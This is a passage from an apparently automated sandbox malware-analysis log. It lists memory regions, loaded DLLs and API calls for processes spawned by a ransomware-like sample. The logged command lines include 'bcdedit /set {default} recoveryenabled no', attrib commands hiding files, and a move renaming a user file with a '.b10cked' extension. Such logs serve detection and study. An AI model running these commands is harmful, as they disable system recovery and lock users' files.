0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31639 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31640 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31641 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 31642 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 31643 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31644 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31645 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31646 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31647 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31648 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31649 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31650 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31651 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31652 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31653 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31654 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31655 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 31656 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31657 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 732 os_tid = 0xba0 Process: id = "532" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = "0xa74" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31658 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31659 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31660 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31661 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31662 start_va = 0x9b0000 end_va = 0x9b6fff entry_point = 0x9b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31663 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31664 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31665 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31666 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31667 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31668 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31669 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31670 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31671 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 31672 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31673 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31674 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31675 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31676 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31677 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31678 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31679 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31680 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31681 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31682 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31683 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31684 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31685 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 31686 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31687 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 733 os_tid = 0xb2c Process: id = "533" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = "0xa74" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31688 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31689 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31690 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31691 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 31692 start_va = 0x6d0000 end_va = 0x6d6fff entry_point = 0x6d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31693 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31694 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31696 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 31697 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31698 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31699 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31700 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31701 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31702 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 31703 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31704 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31705 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31706 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31707 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31708 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31709 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31710 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31711 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31712 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31713 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31714 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31715 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 31716 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31717 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 734 os_tid = 0xe60 Process: id = "534" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16780" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "bcdedit.exe /set {default} recoveryenabled no " cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31743 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31744 start_va = 0x3b0000 end_va = 0x3f9fff entry_point = 0x3b0000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 31745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31750 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31751 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31752 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31753 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 31754 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31755 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31756 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31757 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31758 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31759 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31760 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31761 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 735 os_tid = 0xec0 Process: id = "535" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31730 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31731 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31732 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31733 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31734 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31735 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31736 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31737 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31738 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31739 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31824 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31825 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31826 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31827 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 31828 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31829 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31830 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31831 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31832 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31833 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31834 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31835 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31836 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31837 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31838 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 31839 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31840 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31841 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 31842 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 31843 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 31844 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31845 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 31846 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31847 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 736 os_tid = 0xe40 [0215.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fd1c | out: lpSystemTimeAsFileTime=0x14fd1c*(dwLowDateTime=0xb501cdc0, dwHighDateTime=0x1d440a9)) [0215.100] GetCurrentProcessId () returned 0x914 [0215.100] GetCurrentThreadId () returned 0xe40 [0215.100] GetTickCount () returned 0x3c37d [0215.100] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd14 | out: lpPerformanceCount=0x14fd14*=27188882832) returned 1 